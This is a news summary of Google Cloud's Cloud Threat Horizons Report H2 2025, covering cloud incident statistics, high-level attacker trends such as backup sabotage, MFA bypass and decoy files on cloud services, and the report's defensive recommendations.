Google Cloud has published its Cloud Threat Horizons Report H2 2025, delivering insights into an increasingly complex cyber-threat landscape targeting cloud environments. The report, drawing on analysis from Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting and other security teams, highlights advanced adversarial tactics and provides actionable mitigation guidance for organisations worldwide.
Key Findings: Rising Threat Sophistication and Escalating Risk
- Credential compromise remains dominant: Weak or absent credentials were responsible for 47.1 % of cloud incidents, with misconfigurations accounting for 29.4 % and API/UI-based compromises for 11.8 %.
- Backup infrastructure under direct attack: Financially motivated threat actors have escalated tactics, sabotaging backup systems by deleting routines, corrupting data, and manipulating permissions to disrupt recovery and force ransom payouts.
- MFA bypass through social engineering: Sophisticated social engineering attacks are enabling MFA bypass, including credential and session cookie theft – especially by North Korea‑aligned group UNC4899 (TraderTraitor) targeting crypto‑asset platforms.
- Malware via trusted cloud services: Attackers increasingly exploit platforms like Google Drive, GitHub, Dropbox, and others to host decoy files (e.g., .desktop files masquerading as innocuous PDFs) that trigger background malware downloads.
-
Persistence and evasion techniques evolve: The report emphasises that threat actors are refining evasion and persistence strategies while compromising recovery chains and supply chain integrity.
Top Recommendations: Strengthen Core Defences and Recovery Posture
Google Cloud security experts call for a defence‑in‑depth strategy centred on:
- Robust identity and access management (IAM): Prioritising least‑privilege models, multi‑factor authentication, credential hygiene, and leak detection.
- Resilient recovery infrastructure: Implementing isolated recovery environments – like Cloud Isolated Recovery Environments (CIRE) – to protect against backup sabotage and ensure continuity.
- Vigilant threat and anomaly detection: Monitoring for decoy file deployment and MFA bypass attempts, particularly via deceptive cloud services.
-
Supply chain and developer ecosystem integrity: Including validation mechanisms like Verified CRX Upload for Chrome extensions to prevent malicious updates.
Context & Strategic Significance
As organisations increasingly rely on cloud-native environments, attackers have upgraded their playbook – targeting not just data but the very safety nets designed to recover from compromise. The report underscores that recovery systems are now primary targets, signalling an urgent need for stronger defensive posture across identity, access, and infrastructure resilience.
About the Report
The Cloud Threat Horizons Report H2 2025 provides timely, intelligence-backed insights to help security leaders and practitioners understand emerging cloud threats and implement proactive countermeasures. Created by Google Cloud’s Office of the CISO in collaboration with GTIG, Mandiant, and internal security teams, the report continues the tradition of delivering strategic cybersecurity guidance across cloud ecosystems.
You can read the full report here.
